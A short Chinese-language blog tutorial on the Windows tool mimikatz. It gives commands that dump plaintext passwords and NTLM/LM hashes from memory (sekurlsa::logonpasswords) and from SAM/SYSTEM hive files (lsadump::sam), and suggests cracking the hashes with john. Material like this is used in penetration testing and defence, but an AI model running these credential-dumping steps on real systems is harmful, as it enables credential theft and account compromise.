mimikatz工具的使用

由 shijcc 发布

mimikatz是一款Windows下的明文密码抓取工具。


安装方法:

  1. 访问github仓库下载软件包
  2. 将下载的软件放到本地解压 打开x64orx32
  3. 双击exe文件即可打开,一般来说只会用到那个exe文件。

使用方法:

由于是要操纵系统内存,所以需要Debug权限,一般来说Administrators组是拥有的。
基础命令

mimikatz# cls
清屏
mimikatz# version
版本
mimikatz# xxx::
随便输入,会提示命令不可用,然后列出所有可用命令。

查看当前登录用户

  1. 读取当前系统账户明文密码以及密码hash;
privilege::debug
#如返回 Privilege ‘20’ OK 为正常
sekurlsa::logonpasswords full
#读取用户名、口令、sid、password、LM hash、NTLMhash等信息。

2.读取文件中的ntlm hash值

lsadump::sam /sam:sam.hive /system:system.hive
即可读取ntlm值
注意这两个文件要在mimikatz同一目录
读出NTLM之后可以用john工具破解成明文

暂无评论

发表评论